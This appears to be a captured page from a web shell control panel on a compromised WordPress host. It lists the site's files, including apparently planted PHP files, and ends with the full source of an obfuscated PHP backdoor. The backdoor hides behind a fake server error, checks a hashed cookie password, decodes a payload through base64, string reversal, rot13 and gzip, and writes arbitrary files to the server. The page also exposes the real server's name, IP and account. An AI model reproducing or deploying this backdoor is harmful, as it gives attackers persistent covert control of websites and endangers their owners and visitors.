Linux sagir-us3.hostever.us 5.14.0-503.15.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Nov 28 07:25:19 EST 2024 x86_64
LiteSpeed
Server IP : 104.247.110.100 & Your IP : 216.73.216.54
Domains : 129 Domain
User : killarne
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
killarne /
pinellasparkmovers.com /
Delete
Unzip
Name
Size
Permission
Date
Action
well-known
[ DIR ]
drwxr-xr-x
2026-09-23 07:01
wp-admin
[ DIR ]
drwxr-xr-x
2026-09-23 14:52
wp-content
[ DIR ]
drwxr-xr-x
2026-09-24 00:26
wp-includes
[ DIR ]
drwxr-xr-x
2026-09-24 00:25
.htaccess
2.08
KB
-r--r--r--
2026-09-23 17:41
BDKR28WP.php
23.11
KB
-rw-r--r--
2026-09-23 15:43
bootstrap.php
4.46
KB
-r--r--r--
2026-09-23 17:41
doc_2025-02-25_08-17-28.htaccess
231
B
-rwxr-xr-x
2026-09-23 06:47
error_log
5.91
KB
-rw-r--r--
2026-09-23 17:37
license.txt
19.45
KB
-rwxr-xr-x
2026-09-23 06:47
readme.html
7.23
KB
-rwxr-xr-x
2026-09-23 06:47
robots.txt
76
B
-rw-r--r--
2026-09-23 14:53
sitemap.xml
746
B
-rw-r--r--
2026-09-23 14:53
wp-activate.php
7.04
KB
-rwxr-xr-x
2026-09-23 06:47
wp-blog-header.php
351
B
-rwxr-xr-x
2026-09-23 06:47
wp-comments-post.php
2.28
KB
-rwxr-xr-x
2026-09-23 06:47
wp-conffq.php
146.89
KB
-rwxr-xr-x
2026-09-23 06:57
wp-config-sample.php
2.94
KB
-rwxr-xr-x
2026-09-23 06:47
wp-cron-woig.php
1.62
KB
-rwxr-xr-x
2026-09-23 06:47
wp-cron.php
5.41
KB
-rwxr-xr-x
2026-09-23 06:47
wp-headre.php
17.26
KB
-rwxr-xr-x
2026-06-19 06:51
wp-links-opml.php
2.44
KB
-rwxr-xr-x
2026-09-23 06:47
wp-load.php
3.7
KB
-rwxr-xr-x
2026-09-23 06:47
wp-login.php
48.17
KB
-rwxr-xr-x
2026-09-23 06:47
wp-mail.php
8.34
KB
-rwxr-xr-x
2026-09-23 06:47
wp-registry.php
7.04
KB
-r--r--r--
2026-09-23 17:41
wp-settings.php
24.41
KB
-rwxr-xr-x
2026-09-23 06:47
wp-signup.php
33.54
KB
-rwxr-xr-x
2026-09-23 06:47
wp-trackback.php
4.77
KB
-rwxr-xr-x
2026-09-23 06:47
xmlrpc.php
3.16
KB
-rwxr-xr-x
2026-09-23 06:47
Save
Rename
<?php function endsWith($FullStr, $needle) { $StrLen = strlen($needle); $FullStrEnd = substr($FullStr, strlen($FullStr) - $StrLen); return $FullStrEnd == $needle; } function folder_of_file($p1){ if(!stristr($p1, '/')){ return realpath('./'); } if(strpos($p1, '//') !== false){ $p1 = str_replace('//','/',$p1); } if(endsWith($p1, '/') == true){ $p1 = substr_replace($p1 ,'', -1); } $p2 = ''; $ar = explode('/', $p1); for($i=1; $i < count($ar) - 1; $i++){ $p2 .= '/'.$ar[$i]; } if($p1[0] == '.' && $p1[1] == '/'){ $p2 = './'.$p2; } if($p1[0] == '.' && $p1[1] == '.'){ $p2 = '../'.$p2; } if(strpos($p2, '//') !== false){ $p2 = str_replace('//','/',$p2); } return trim($p2); } function save($path, $source){ $os = strtolower(substr(PHP_OS, 0, 3)); $folder_P = folder_of_file($path); if (!is_writable($folder_P) && $os != "win"){ chmod($folder_P, 0755); } if (file_exists($path) && is_file($path) && !is_writable($path) && $os != "win"){ chmod($path, 0644); } if(function_exists('file_put_contents')){ $saV = file_put_contents($path, $source); }else{ $saV = fwrite(fopen($path, 'w'), $source); } return $saV; } if(!empty($_GET['action'])){ die('Sorry the page you were looking for could not be found.'); } if (md5(md5(md5($_COOKIE['pwd']))) !== '0d4f69bb38f2354a6d896d6a222a4bf5' || empty($_POST['name']) || empty($_POST['age'])){ header('HTTP/1.1 500 Internal Server Error', true, 500); exit(0); } $b = 'ba'.'s'.'e'.'6'.'4_'.'de'.'co'.'de';$srv = 'str'.'rev';$rot = 'str'.'_'.'rot'.'13'; save(trim($_POST['name']), gzuncompress($b($srv($rot(trim($_POST['age'])))))); echo '<html><center>./Done</center></html>'; ?>